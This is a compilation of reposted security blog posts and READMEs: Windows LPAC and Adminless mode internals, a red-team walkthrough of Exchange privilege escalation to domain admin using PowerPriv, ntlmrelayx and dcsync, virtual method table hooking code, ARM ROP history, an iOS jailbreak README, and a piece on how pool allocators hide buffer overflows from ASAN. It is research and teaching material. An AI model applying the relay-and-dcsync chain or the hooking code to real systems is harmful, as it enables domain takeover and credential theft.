S-1-15-2-2 = ALL RESTRICTED APPLICATION PACKAGES = LPAC

(RX) gives Read & Execute access. (M) gives Modify access. (F) gives Full access.

Identifying LPAC Processes

PowerShell users can utilize James Forshaw's excellent NtObjectManager tool (https://www.powershellgallery.com/packages/NtObjectManager/) to identify LPAC. The Get-NtProcessMitigations Cmdlet will differentiate between regular AppContainer and LPAC (Less Privileged AppContainer) in the output.

Process Hacker (latest Nightly builds) can identify LPAC as well. On the Token tab, go to Advanced to bring up the Token Properties and go to the Attributes tab. LPAC can be identified with the WIN://NOALLAPPPKG security attribute.

Also, James Forshaw's TokenViewer program, which is part of Google's sandbox-attacksurface-analysis-tools (https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools), can also identify LPAC via the WIN://NOALLAPPPKG security attribute and is also fantastic with regard to viewing Capabilities and such.

(more details to update later)

LICENSE

This project uses the MIT License. JSON handling uses https://github.com/nlohmann/json , and some APIs come from NSudo but have been rewritten.

Sursa: https://github.com/WildByDesign/Privexec
Sunday, 13 January 2019

Enabling Adminless Mode on Windows 10 SMode

Microsoft has always been pretty terrible at documenting new and interesting features for their System Integrity Policy used to enable security features like UMCI, Device Guard/Windows Defender Application Control etc. This short blog post is about another feature which seems to be totally undocumented*, but is available in Windows 10 since 1803, Adminless mode.

* No doubt Alex Ionescu will correct me on this point if I'm wrong.

TL;DR; Windows 10 SMode has an Adminless mode which fails any access check which relies on the BUILTIN\Administrators group. This is somewhat similar to macOS's System Integrity Protection in that the Administrator user cannot easily modify system resources. You can enable it by setting the DWORD value SeAdminlessEnforcementModeEnabled in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel to 1 on Windows 10 1809 SMode. I'd not recommend setting this value on a working SMode system as you might lock yourself out of the computer.

If you look at the kernel in 1803 and above at the API SeAccessCheck (and similar) you'll see it now calls the method SeAccessCheckWithHintWithAdminlessChecks. The Adminless part is new, but what is Adminless and how is it enabled?
Let's see some code, this is derived from 1809 [complexity reduced for clarity]:

    BOOLEAN SeAccessCheck(PSECURITY_DESCRIPTOR SecurityDescriptor,
                          PSECURITY_SUBJECT_CONTEXT SubjectSecurityContext,
                          BOOLEAN SubjectContextLocked,
                          ACCESS_MASK DesiredAccess,
                          ACCESS_MASK PreviouslyGrantedAccess,
                          PPRIVILEGE_SET *Privileges,
                          PGENERIC_MAPPING GenericMapping,
                          KPROCESSOR_MODE AccessMode,
                          PACCESS_MASK GrantedAccess,
                          PNTSTATUS AccessStatus) {
      BOOLEAN AdminlessCheck = FALSE;
      PTOKEN Token = SeQuerySubjectContextToken(SubjectSecurityContext);
      DWORD Flags;
      BOOLEAN Result;

      SeCodeIntegrityQueryPolicyInformation(205, &Flags, sizeof(Flags));
      if (Flags & 0xA0000000) {
        AdminlessCheck = SeTokenIsAdmin(Token) &&
            !RtlEqualSid(SeLocalSystemSid, Token->UserAndGroups->Sid);
      }

      if (AdminlessCheck) {
        Result = SeAccessCheckWithHintWithAdminlessChecks(
                     ..., GrantedAccess, AccessStatus, TRUE);
        if (Result) {
          return TRUE;
        }

        if (SepAccessStatusHasAccessDenied(GrantedAccess, AccessStatus)
              && SeAdminlessEnforcementModeEnabled) {
          SepLogAdminlessAccessFailure(...);
          return FALSE;
        }
      }

      return SeAccessCheckWithHintWithAdminlessChecks(..., FALSE);
    }

The code has three main parts. First a call is made to SeCodeIntegrityQueryPolicyInformation to look up system information class 205 from the CI module. Normally these information classes are also accessible through NtQuerySystemInformation, however 205 is not actually wired up in 1809, therefore you can't query the flags from user-mode directly.

If the flags returned have bits 31 or 29 set, then the code tries to determine if the token being used for the access check is an admin (is the token a member of the BUILTIN\Administrators group) and is not a SYSTEM token based on the user SID. If this token is not an admin, or it's a SYSTEM token, then the second block is skipped. The SeAccessCheckWithHintWithAdminlessChecks method is called with the access check arguments and a final argument of FALSE and the result returned.
This is the normal control flow for the access check. If the second block is instead entered, SeAccessCheckWithHintWithAdminlessChecks is called with the final argument set to TRUE. This final argument is what determines whether Adminless checks are enabled or not, but not whether the checks are enforced. We'll see what the checks are in a minute, but first let's continue here.

Finally in this block SepAccessStatusHasAccessDenied is called, which takes the granted access and the NTSTATUS code from the check and determines whether the access check failed with access denied. If the global variable SeAdminlessEnforcementModeEnabled is also TRUE then the code will log an optional ETW event and return FALSE indicating the check has failed. If Adminless mode is not enabled, the normal non-Adminless check is made.

There are two immediate questions you might ask: first, where do the CI flags get set, and second, how do you set SeAdminlessEnforcementModeEnabled to TRUE? The latter is easy: by creating a DWORD registry value set to 1 in "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Kernel" with the name AdminlessEnforcementModeEnabled, the kernel will set that global variable to TRUE.

The CI flags is slightly more complicated, the call to SeCodeIntegrityQueryPolicyInformation drills down to SIPolicyQueryWindowsLockdownMode inside the CI module, which looks like the following:

    void SIPolicyQueryWindowsLockdownMode(PULONG LockdownMode) {
      SIPolicyHandle Policy;
      if (SIPolicyIsPolicyActive(7, &Policy)) {
        ULONG Options;
        SIPolicyGetOptions(Policy, &Options, NULL);
        if ((Options >> 6) & 1)
          *LockdownMode |= 0x80000000;
        else
          *LockdownMode |= 0x20000000;
      } else {
        *LockdownMode |= 0x40000000;
      }
    }

The code queries whether policy 7 is active. Policy 7 corresponds to the system integrity policy file loaded from WinSIPolicy.p7b (see g_SiPolicyTypeInfo in the CI module) which is the policy file used by SMode (what used to be Windows 10S).
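The lockdown-flag logic reduces to a couple of bit tests. A minimal sketch (in Python, purely to model the bit arithmetic, not the kernel API) mirroring SIPolicyQueryWindowsLockdownMode and the SMode test in SeAccessCheck:

```python
def windows_lockdown_mode(policy7_active, option_bit6):
    # Mirrors SIPolicyQueryWindowsLockdownMode: policy 7 (the SMode policy
    # from WinSIPolicy.p7b) sets bit 31 or bit 29; otherwise bit 30.
    if policy7_active:
        return 0x80000000 if option_bit6 else 0x20000000
    return 0x40000000

def is_smode(flags):
    # The kernel's check: (Flags & 0xA0000000) != 0, i.e. bit 31 or bit 29.
    return bool(flags & 0xA0000000)

assert is_smode(windows_lockdown_mode(True, True))        # bit 31 set
assert is_smode(windows_lockdown_mode(True, False))       # bit 29 set
assert not is_smode(windows_lockdown_mode(False, False))  # bit 30 set
```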
If policy 7 is active then, depending on an additional option flag, either bit 31 or bit 29 is set in the LockdownMode parameter. If policy 7 is not active then bit 30 is set. Therefore what the call in SeAccessCheck is checking for is basically whether the current system is running Windows in SMode. We can see this more clearly by looking at 1803, which has slightly different code:

    if (!g_sModeChecked) {
      SYSTEM_CODE_INTEGRITY_POLICY Policy = {};
      ZwQuerySystemInformation(SystemCodeIntegrityPolicyInformation,
                               &Policy, sizeof(Policy));
      g_inSMode = Policy.Options & 0xA0000000;
      g_sModeChecked = TRUE;
    }

The code in 1803 makes it clear that if bit 29 or 31 is set then the system is considered to be in SMode. This code also uses ZwQuerySystemInformation instead of SeCodeIntegrityQueryPolicyInformation to extract the flags via the SystemCodeIntegrityPolicyInformation information class. We can call this instead of information class 205 using NtObjectManager.

We can see in the screenshot below that on a non-SMode system calling NtSystemInfo::CodeIntegrityPolicy has Flag40000000 set, which would not be considered SMode. In contrast, on an SMode installation we can see Flag20000000 is set instead. This means it's ready to enable Adminless mode.

We now know how to enable Adminless mode, but what is the mode enforcing? The final parameter to SeAccessCheckWithHintWithAdminlessChecks is forwarded to other methods. For example the method SepSidInTokenSidHash has been changed. This method checks whether a specific SID is in the list of a token's group SIDs. This is used for various purposes. For example when checking the DACL each ACE is enumerated and SepSidInTokenSidHash is called with the SID from the ACE and the token's group list. If the SID is in the group list the access check handles the ACE according to type and updates the current granted access.
The change for Adminless looks like the following:

    BOOLEAN SepSidInTokenSidHash(PSID_AND_ATTRIBUTES_HASH SidAndHash,
                                 PSID Sid,
                                 BOOLEAN AdminlessCheck) {
      if (AdminlessCheck && RtlEqualSid(SeAliasAdminsSid, Sid))
        return FALSE;
      // ...
      return TRUE;
    }

Basically if the AdminlessCheck argument is TRUE and the SID to check is BUILTIN\Administrators then fail immediately. This check is repeated in a number of other places as well. The net result is Administrators (except for SYSTEM, which is needed for system operation) can no longer access a resource based on being a member of the Administrators group.

As far as I can tell it doesn't block privilege checks, so if you were able to run under a token with "GOD" privileges such as SeDebugPrivilege you could still circumvent the OS security. However you need to be running with High Integrity to use the most dangerous privileges, which you won't get as a normal user.

I don't really know what the use case for this mode is; at least it's not currently on by default in SMode. As it's not documented anywhere I could find, I assume it's also not something Microsoft are expecting users/admins to enable. The only thoughts I had were kiosk style systems, or Hyper-V containers where you want to block all administrator access. If you were managing a fleet of SMode devices you could also enable this to make it harder for a user to run code as admin, however it wouldn't do much if you had a privilege escalation to SYSTEM.

This sounds similar in some ways to System Integrity Protection/SIP/rootless on macOS in that it limits the ability of a user to modify the system, except that rather than a flag which indicates a resource can be modified like on macOS, an administrator could still modify a resource as long as they have another group to use.

Perhaps eventually Microsoft might document this feature, considering the deep changes to access checking it required. Then again, knowing Microsoft, probably not.
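To illustrate the effect of the patched check, here is a toy model (not the real function; SIDs are modeled as strings, and the token's group list is a plain Python list):

```python
ADMINS_SID = "S-1-5-32-544"  # BUILTIN\Administrators (SeAliasAdminsSid)

def sid_in_token_sid_hash(token_group_sids, sid, adminless_check):
    # Under Adminless, an ACE granting access via BUILTIN\Administrators
    # can never match, regardless of the token's actual groups.
    if adminless_check and sid == ADMINS_SID:
        return False
    return sid in token_group_sids

admin_token_groups = ["S-1-5-32-545", ADMINS_SID]  # Users + Administrators

# Normal check: membership in Administrators matches the ACE.
assert sid_in_token_sid_hash(admin_token_groups, ADMINS_SID, False)
# Adminless check: the same ACE is rejected outright...
assert not sid_in_token_sid_hash(admin_token_groups, ADMINS_SID, True)
# ...but access granted via any other group the token holds still works.
assert sid_in_token_sid_hash(admin_token_groups, "S-1-5-32-545", True)
```

This matches the observation above that an administrator can still access a resource through some other group on their token; only ACEs keyed to BUILTIN\Administrators stop matching.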
Posted by tiraniddo

Sursa: https://tyranidslair.blogspot.com/2019/01/enabling-adminless-mode-on-windows-10.html
Thursday, January 31, 2019

Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv

TL;DR: A new take on the recently released Exchange privilege escalation attack allowing for remote usage without needing to drop files to disk, local admin rights, or knowing any passwords at all. Any shell on a user account with a mailbox = domain admin.

I wrote a PowerShell implementation of PrivExchange that uses the credentials of the current user to authenticate to Exchange. Find it here: https://github.com/G0ldenGunSec/PowerPriv

The Exchange attack that @_dirkjan released last week (https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) provides an extremely quick path to full domain control on most networks, especially those on which we already have a device that we can run our tools on, such as during an internal network penetration test. However, I saw a bit of a gap from the point of a more red-team focused attack scenario, in which we often wouldn't have a box on the internal client network that we can run python scripts on (such as ntlmrelayx and PrivExchange) without either installing python libraries or compiling the scripts to binaries and dropping them to disk to run. Additionally, we may not have a user's plaintext or NTLM hashes to run scripts with remotely via proxychains.

Trying to find a more effective solution for this scenario, I wrote a PowerShell implementation of PrivExchange called PowerPriv that uses the credentials of the current user to authenticate to the Exchange server. This gets around the problem of needing credentials, as we'll now just use the already-compromised account to authenticate for us. However, this was really only a first step, as it still required that we relay to the domain controller through ntlmrelayx, meaning that we would still need a box on the network running Linux / need to install Python / etc.
To put the rest of the pieces together, I used a bunch of the great tunneling functionality that comes in Cobalt Strike to set up a relay for the inbound NTLM authentication request (via HTTP) from the Exchange server, through our compromised host system, to the Cobalt Strike server, and back out to the target domain controller (via LDAP). At a high level, this is what we're doing:

So, in more depth, what are we actually doing here? To begin, let's get a 'compromised' system and check who the local admins are: Cool, we're running as 'tim', a user who is not currently an admin on this system, but that shouldn't matter.

Next, let's get our forwarding set up using the 'socks' + 'rportfwd' commands in Cobalt Strike and the /etc/proxychains.conf file: We're doing a few things here: setting up a reverse port forward to send traffic from port 80 on the compromised system to port 80 on our attacker system, and then setting up a SOCKS proxy to forward traffic back out through the compromised system over port 36529 on our box (the specific port used doesn't matter). Once we've configured these, we can use proxychains to forward traffic through our SOCKS proxy set up on port 36529. To perform the relay, we'll run ntlmrelayx, forwarding traffic through proxychains in order to get it back to the target environment.

After this is up and running, we are ready to kick off the attack. I'm using the PowerShell implementation of PrivExchange that I wrote, called PowerPriv, to authenticate using Tim's credentials. In this example, all we need are the IPs of the Exchange server and the system which we currently have a shell on, since our compromised system will be relaying the incoming request to our attack server: After this, we sit back and wait a minute for the NTLM authentication request to come back from the remote Exchange server: Looks like our attack succeeded.
Let's see if Tim can now perform a dcsync and get another user's NTLM hash, even though Tim is only a lowly domain user: A resounding success! All without ever needing to know what Tim's password is, perform any poisoning attacks, or drop files onto his system. As to why we're using the Cobalt Strike dcsync module vs secretsdump - in this scenario we do not have a plaintext password or NTLM hash for Tim (or any user), which would be required if we want to run secretsdump from our box via proxychains. If you do have credentials, you can definitely use whichever method you prefer.

A few gotchas from during this process:
- Make sure to use an appropriate type of malleable profile for your beacon. Don't try and be fancy and send data over URIs or parameters. Due to the nature of the relayed authentication, we need to be able to quickly get the authentication request and forward it back out. I also completed all testing using an interactive beacon; a 5-minute sleep isn't going to work for this one.
- I was initially having issues getting the dcsync working when using an FQDN (vs. the netbios name) of my target domain. This was likely due to how I configured my naming conventions on my local domain, but something to be aware of.
- In this example, my Cobalt Strike teamserver was running on the same box as my Cobalt Strike operator console (I was not connecting to a remote team server). If you have a remote team server, this is where you would need to set up your relay, as this is where the reverse port fwd would be dumped out to.
(May need further testing)

Notes and links:
- @_Dirkjan's blog, which covers the actual Exchange priv esc bug that he found in greater depth: https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
- Github repo for PowerPriv: https://github.com/G0ldenGunSec/PowerPriv
- Github repo for ntlmrelayx: https://github.com/SecureAuthCorp/impacket
- Cobalt Strike resources on port fwd'ing and SOCKS proxies:
https://www.youtube.com/watch?v=bwq0ToNPCtg
https://blog.cobaltstrike.com/2016/06/01/howto-port-forwards-through-a-socks-proxy/

*This technique was demonstrated in the article with Cobalt Strike. However, this same vector is possible using other agents that support port forwarding and proxying, such as Meterpreter.

Posted by Dave at 12:17 PM

Sursa: http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html
-
Virtual Method Table Hooking Explained

Posted on January 30, 2019 by niemand

Virtual Function Hooking

We have seen in the previous post that sometimes we need to understand and use VFs (Virtual Functions) in order to properly hook a function. So far we have seen this two times: when we hooked Present to control the rendering flow of DirectX (here); and when we hooked DrawIndexed to fingerprint models from DirectX (here). In both cases, we took for granted how this process works and we didn't see in detail how to implement this for other methods we may need to hook. Let's quickly review what we saw in the previous posts.

VF table in memory.

What have we seen so far?

To obtain the real address of DrawIndexed, we did the following:

typedef void(__stdcall *ID3D11DrawIndexed)(ID3D11DeviceContext* pContext, UINT IndexCount, UINT StartIndexLocation, INT BaseVertexLocation);

DWORD_PTR* pDeviceContextVTable = NULL;
ID3D11DrawIndexed fnID3D11DrawIndexed;

pDeviceContextVTable = (DWORD_PTR*)pContext;
pDeviceContextVTable = (DWORD_PTR*)pDeviceContextVTable[0];
fnID3D11DrawIndexed = (ID3D11DrawIndexed)pDeviceContextVTable[12];

std::cout << "[+] pDeviceContextVTable Addr: " << std::hex << pDeviceContextVTable << std::endl;
std::cout << "[+] fnID3D11DrawIndexed Addr: " << std::hex << fnID3D11DrawIndexed << std::endl;

Basically, we need to know two things: an instance of the class and the offset of the method inside the VF table. Getting an instance of the class may vary depending on the class we are trying to hook: sometimes we can create a fake and temporary object to traverse its VF table and find the real address of the function; another option is to obtain a reference to an already existent instance and traverse its VF table. The big question is how we can know the correct offset for our so appreciated method. That's what we are going to learn today.
When we hooked DrawIndexed we used pContext, which was a reference to an already existent instance of ID3D11DeviceContext. However, when we tried to do the same for Present, we had to create our own instance of IDXGISwapChain and then traverse its VF table. Which option you choose will depend on what you are trying to do and how the game/engine has been implemented.

How do VF tables work?

When we hook VF tables, we can achieve this in multiple ways; the most common ones are to overwrite the address in the VF table with a pointer to our function, or to inject a JMP inside the original function. For the second case, we need to take into account that we will have to fix in our function whatever we are overwriting inside the original function. For example, if you overwrite a sub rsp,30 to place a new JMP, you have to make sure to fix RSP when you call back to the original function.

Modifying the real function address stored in the VF table sounds awesome, but what does this actually mean? What we do is basically the following:

1. Use an instance of the class to obtain its VF table
2. Traverse the table and find our target method using its offset
3. Store the original address of our target method
4. Modify this entry in the VF table with the address of our modified method
5. (Optional) Restore the original address once we accomplish our goal

What will happen the next time the game tries to call the hooked method? The game will traverse the VF table of the object to obtain the real address of the method. Since this table has been modified by us, the game will end up thinking that the real address of the method is our newly injected address and will redirect the flow of the process to this address. Great! Now the game will execute our method. After that, we usually need to call the original method by using the address we stored before modifying the VF table. Something we need to be aware of is that the VF table is not always used to identify the real address of a function.
This won't always happen, and whether we can use this technique will depend on a few things. Let's say we have a class called "Foo" and we want to call its method "hack". There are different ways of doing this, depending on how the class and its methods have been implemented:

1. fooInst.hack();
2. fooInst->hack();
3. (*fooInst).hack();

In the first case, the application won't traverse the VF table, unless it is used as a reference to an instance, because it knows the exact address and type of the function. For the last two cases, the VF table will be traversed successfully because of something called type ambiguity. This happens because the compiler checks for ambiguities at compile time, and it is unclear how to resolve the access to the function. There are multiple cases where the compiler finds a declaration ambiguous, and there is plenty of information on the internet about this.

Finding the correct offset at runtime

Let's imagine that we need to hook a method of ID3D11DeviceContext and we already have an instance of this object called pContext. We may have obtained this instance as a reference by locating an already existing object or by creating our own one. What we could do is print the address of our instance, so now we can attach to the process and locate it in memory: By having this address we can attach any debugger we want and start analyzing our instance at run time. Below you can see the address where our instance is located: The first pointer, located at `436CFCB8`, will be the address of the VF table we are looking for. Let's follow that pointer: It looks like there are a lot of pointers - perfect, this is what we were looking for: the VF table. Now the next step would be to identify the correct offset of our target function.
If we do Right Click -> Follow QWORD in Disassembler and we have the debugging symbols for d3d11.dll, we will be able to see the name of the function that starts at that address, as you can see at the top of the previous image:

`.text_hf:00007FFE06FC7CD0 d3d11.dll:$187CD0 #1868D0 <CContext::TID3D11DeviceContext_DrawIndexed_Amortized<1>>`

By counting the index of the entry we have just found, we can obtain its offset. In this case it will be 12.

Finding the correct offset statically

For DLLs with symbols, it's pretty simple to check this statically as well, using IDA for example. By opening d3d11.dll and looking through `.rdata` for adjacent function offsets, we can easily find the VF table of TID3D11DeviceContext: You can see the offsets marked with red numbers on each reference. The number 12 will correspond to our target function.

Conclusion

As you can see, finding the correct offset is quite simple and there are multiple ways to achieve the same result. These are two examples that you can use to quickly find the offsets you need when hooking a function. Of course, if you are trying to hook a custom class without symbols, more reversing will be required in order to identify the class vtable inside the .exe/.dll.

Sursa: https://niemand.com.ar/2019/01/30/virtual-method-table-hooking-explained/
-
Mon 03 September 2018

ARM Exploitation: Return oriented Programming

Categories: «Reverse Engineering» Author: dimi

ARM Exploitation: Return oriented Programming
- Building ROP chains
- Changelog
- ... on the shoulders of giants (ROP history)
- return-into-libc
- Borrowed Code Chunks
- Return Oriented Programming
- ROP on ARM
- More interesting papers

Building ROP chains

This series is about exploiting simple stack overflow vulnerabilities using return oriented programming (ROP) to defeat data execution prevention - DEP. There are three posts in this series. The posts got pretty dense; there is a lot of stuff to understand. If you miss anything, find bugs (language / grammar / ...), have ideas for improvements or any questions, do not hesitate to contact me (via Twitter or contact page). I am happy to answer your questions and incorporate improvements in this post.

Latest update of this series: 03.12.2018

Changelog
03.12.2018: Added a working, prebuilt environment to ease the process of getting started. See first part.
13.10.2018: Updated "Setup & Tools" with hints on how to initialize the Archlinux ARM keyring and commands to install the necessary packages. Also added a command line switch to disable GCC stack canaries.
07.09.2018: Added note on successfully setting up the bridge interface with qemu (in the first part).

1 - ARM Exploitation - Setup and Tools
In the first part I describe the setup I used, which includes a set of scripts to build a QEMU based ArchLinux ARM environment and a vulnerable HTTP daemon, which is exploited during this series.

2 - ARM Exploitation - Defeating DEP - execute system()
In the second part I try to explain the general idea of ROP chains, ROP gadgets and how to chain them to achieve a goal. ROP theory!

3 - ARM Exploitation - Defeating DEP - executing mprotect()
In the third part we will get into the nitty-gritty details of a ROP chain. I will explain where and how to find gadgets, how and where to place the ROP chain.
In the end we will have regained the permissions DEP took from us!

... on the shoulders of giants (ROP history)

There are thousands of great blogs, videos, tutorials, papers and magazines out there. Many great minds publish, write, draw and record stuff and make it freely available for everyone. Never in history was it that easy to learn something - just invest some time and effort. I also had the opportunity to enjoy a great and recommendable training by @therealsaumil on ARM exploitation during BlackHat this year - you can find infos, resources and a ROP challenge at his blog. I can't name all of the great minds who influenced me over the years without forgetting somebody. There is a lot of great work on ROP on different platforms. An incomplete list of resources you want to consider reading in parallel to, after or before reading my post, would be:

source: Tim Kornau's diploma thesis

return-into-libc

1997 Solar Designer published the first "return-into-libc" buffer overflow exploit. In those days parts of the stack just got non-executable: funnily enough, it was also Solar Designer who posted the patch for the Linux kernel, just to publish months later a way to circumvent his own patch. The term "Return oriented Programming" was not yet established; "return into libc" was used. The exploited platform was x86, so return-into-libc exploited an NX stack by searching for the string "/bin/sh" in memory, then placing the address of the string and the address of system(), using the overflow, on the stack. Execution got redirected to system() (via the overwritten ret) and /bin/sh executed. He even described how to call two libc functions, the second one without parameters, since they would use the exact same space as the parameters for the first function call. He also proposed to fix this by placing libc in regions of memory which contain a zero byte.
Since most buffer overflow exploits got exploited via an overflown ASCIIZ string, that would render his version of the return-into-libc ineffective (since the address of system() would have a zero byte in it).

His paper: lpr LIBC RETURN exploit

Rafal Wojtczuk then, only some months later, extended the return-into-libc by:
- Exploiting the PLT address of libc functions, which are not in memory regions with zero bytes.
- Placing shellcode in the still executable data segment.

His paper: Defeating Solar Designer's Non-executable Stack Patch

A further improvement was released 2001 in Phrack by Nergal, where two methods to call multiple functions with parameters were described:
- ESP lifting - in binaries which were compiled with -fomit-frame-pointer, it was possible to use their special epilogue by returning to it, after calling the first function, to shift the stack pointer into higher regions (since the original task of the epilogue was to clean up its function's stack frame!) to the second function's call construct.
- pop-ret: by returning to a pop; ret (or: many-pop; ret) gadget instead of to the second function, you can pop the arguments of the called function before continuing with the next function. The caveat: multiple-pop-and-ret gadgets are quite rare.
- frame faking (programs compiled without -fomit-frame-pointer): by overwriting the saved EBP with the next called function's frame and returning into a LEAVE; RET gadget, the frame pointer can be moved ever further to the next called function.

Borrowed Code Chunks

With the ELF64 ABI the parameters of a function were passed via the registers instead of on the stack. This rendered the already mentioned return-into-libc useless. Sebastian Krahmer then described the "borrowed code chunks" technique, which used a gadget (even if not yet named that) to move the value of register rsp into the register rdi and then ret - executing system() again in an ELF64 ABI binary.
His paper: x86-64 buffer overflow exploits and the borrowed code chunks exploitation technique

Return Oriented Programming

In 2007 the term Return Oriented Programming (and gadget) was coined by H. Shacham in a paper named "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)". He generalized the principle of return oriented programming by using "short code sequences" (i.e. gadgets) instead of whole functions. He described a set of gadgets which were "Turing complete by inspection", so they allowed arbitrary computation.

ROP on ARM

Tim Kornau then published in 2010 his diploma thesis on ROP on ARM architectures. He nicely summarized how gadgets and ROP shellcode on ARM can be crafted. It really is one of the bases of my summary on that topic, so if you want an even deeper dive into ROP on ARM, make sure to work through his great thesis. A second must-read is the technical paper Return-Oriented Programming without Returns on ARM. It describes many of the techniques used here!

More interesting papers

A small, incomplete list of publications you might want to look over:
- Alphanumeric RISC ARM Shellcode
- Code Injection Attacks on Harvard-Architecture Devices
- Return-Oriented Programming on a Cortex-M Processor

If you miss any links here, let me know!

next post of this series >>

Sursa: https://blog.3or.de/arm-exploitation-return-oriented-programming.html
-
OsirisJailbreak12

iOS 12.0 -> 12.1.2 Incomplete Jailbreak with CVE-2019-6225

An incomplete iOS 12 jailbreak. For now it only runs the exploit, gets tfp0, gets ROOT, escapes the sandbox, writes a test file to prove the sandbox was escaped, then resprings. Feel free to build on top of it as long as you respect the GPLv3 license.

Older (4K) devices are not supported for now. 16K devices are. A12 is experimental - may not work.

In order to compile this app, you need to add qilin.o to the project. This can be downloaded from http://newosxbook.com/QiLin/qilin.o

DEVELOPER JAILBREAK! NOT FOR THE GENERAL PUBLIC

Demo video: https://twitter.com/FCE365/status/1090770862238777344

Credits:
Jonathan Levin for QiLin and his books!
Brandon Azad for the tfp0 exploit
Xerub(?) Patchfinder64
Me: GeoSn0w on Twitter: @FCE365
My YouTube channel: iDevice Central

Sursa: https://github.com/GeoSn0w/OsirisJailbreak12/
-
When your Memory Allocator hides Security Bugs

Posted by Hanno Böck on Wednesday, January 30. 2019

Recently I shared some information about potential memory safety bugs in the Apache web server together with Craig Young. One issue that came up in that context is the so-called pool allocator Apache is using.

What is this pool allocator? Apache's APR library has a feature where you can allocate a pool, which is a larger area of memory, and then do memory allocations within that pool. It's essentially a separate memory allocation functionality provided by the library. Similar concepts exist in other software.

Why would anyone do that? It might bring performance benefits to have memory allocation that's optimized for a specific application. It also can make programming more convenient when you can allocate many small buffers in a pool and then not bother about freeing each one of them, and instead just free the whole pool with all allocations within.

There's a disadvantage with the pool allocator, and that is that it may hide bugs. Let's look at a simple code example:

#include <apr_pools.h>
#include <stdio.h>
#include <string.h>

int main() {
    apr_pool_t *p;
    char *b1, *b2;
    apr_initialize();
    apr_pool_create(&p, NULL);
    b1 = apr_palloc(p, 6);
    b2 = apr_palloc(p, 6);
    strcpy(b1, "This is too long");
    strcpy(b2, "Short");
    printf("%s %s\n", b1, b2);
}

We can compile this with:

gcc $(pkg-config --cflags --libs apr-1) input.c

What we're doing here is that we create a pool p and we create two buffers (b1, b2) within that pool, each six bytes. Now we fill those buffers with strings. However for b1 we fill it with a string that is larger than its size. This is thus a classic buffer overflow. The printf at the end, which outputs both strings, will show garbled output, because the two buffers interfere.

Now the question is how do we find such bugs? Of course we can carefully analyze the code, and in the simple example above this is easy to do.
But in complex software such bugs are hard to find manually, therefore there are tools to detect unsafe memory access (e.g. buffer overflows, use after free) during execution. The state of the art tool is Address Sanitizer (ASAN). If you write C code and don't use it for testing yet, you should start doing so now. Address Sanitizer is part of both the gcc and clang compiler and it can be enabled by passing -fsanitize=address on the command line. We'll also add -g, which adds debugging information and will give us better error messages. So let's try:

gcc -g -fsanitize=address $(pkg-config --cflags --libs apr-1) input.c

If you try this you will find out that nothing has changed. We still see the garbled string and Address Sanitizer has not detected the buffer overflow. Let's try rewriting the above code in plain C without the pool allocator:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main() {
    char *b1, *b2;
    b1 = malloc(6);
    b2 = malloc(6);
    strcpy(b1, "This is too long");
    strcpy(b2, "Short");
    printf("%s %s\n", b1, b2);
}

If we compile and run this with ASAN it will give us a nice error message that tells us what's going on:

==9319==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000016 at pc 0x7f81fdd08c9d bp 0x7ffe82881930 sp 0x7ffe828810d8
WRITE of size 17 at 0x602000000016 thread T0
    #0 0x7f81fdd08c9c in __interceptor_memcpy /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/gcc-8.2.0/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:737
    #1 0x5636994851e0 in main /tmp/input.c:10
    #2 0x7f81fdb204ea in __libc_start_main (/lib64/libc.so.6+0x244ea)
    #3 0x5636994850e9 in _start (/tmp/a.out+0x10e9)

0x602000000016 is located 0 bytes to the right of 6-byte region [0x602000000010,0x602000000016)
allocated by thread T0 here:
    #0 0x7f81fddb6b10 in __interceptor_malloc /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/gcc-8.2.0/libsanitizer/asan/asan_malloc_linux.cc:86
    #1 0x5636994851b6 in main /tmp/input.c:7
    #2 0x7f81fdb204ea in
__libc_start_main (/lib64/libc.so.6+0x244ea)

So why didn't the error show up when we used the pool allocator? The reason is that ASAN is built on top of the normal C memory allocation functions like malloc/free. It does not know anything about APR's pools. From ASAN's point of view the pool is just one large block of memory, and what's happening inside is not relevant. Thus we have a buffer overflow, but the state of the art tool to detect buffer overflows is unable to detect it.

This is obviously not good, it means the pool allocator takes one of the most effective ways to discover an important class of security bugs away from us. If you're looking for solutions for that problem you may find old documentation about "Debugging Memory Allocation in APR". However it relies on flags that have been removed from the APR library, so it's not helpful. However there's a not very well documented option of the APR library that allows us to gain memory safety checks back. Passing --enable-pool-debug=yes to the configure script will effectively disable the pool allocator and create a separate memory allocation for each call to the pool allocator.
If we compile our first example again, this time with the pool debugger and ASAN, we'll see the error:

==20228==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000016 at pc 0x7fe2e625dc9d bp 0x7ffe8419a180 sp 0x7ffe84199928
WRITE of size 17 at 0x602000000016 thread T0
    #0 0x7fe2e625dc9c in __interceptor_memcpy /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/gcc-8.2.0/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:737
    #1 0x55fe439d132c in main /tmp/input.c:15
    #2 0x7fe2e5fc34ea in __libc_start_main (/lib64/libc.so.6+0x244ea)
    #3 0x55fe439d1129 in _start (/tmp/a.out+0x1129)

0x602000000016 is located 0 bytes to the right of 6-byte region [0x602000000010,0x602000000016)
allocated by thread T0 here:
    #0 0x7fe2e630bb10 in __interceptor_malloc /var/tmp/portage/sys-devel/gcc-8.2.0-r6/work/gcc-8.2.0/libsanitizer/asan/asan_malloc_linux.cc:86
    #1 0x7fe2e6203157 (/usr/lib64/libapr-1.so.0+0x1f157)
    #2 0x7fe2e5fc34ea in __libc_start_main (/lib64/libc.so.6+0x244ea)

Apache is not alone in having a custom memory allocation that can hide bugs. Mozilla's NSPR and NSS libraries have something called an Arena Pool, Glib has memory slices and PHP has the Zend allocator. All of them have the potential of hiding memory safety bugs from ASAN, yet luckily all have an option to be turned off for testing. I maintain a collection of information about such custom allocators and how to disable them.

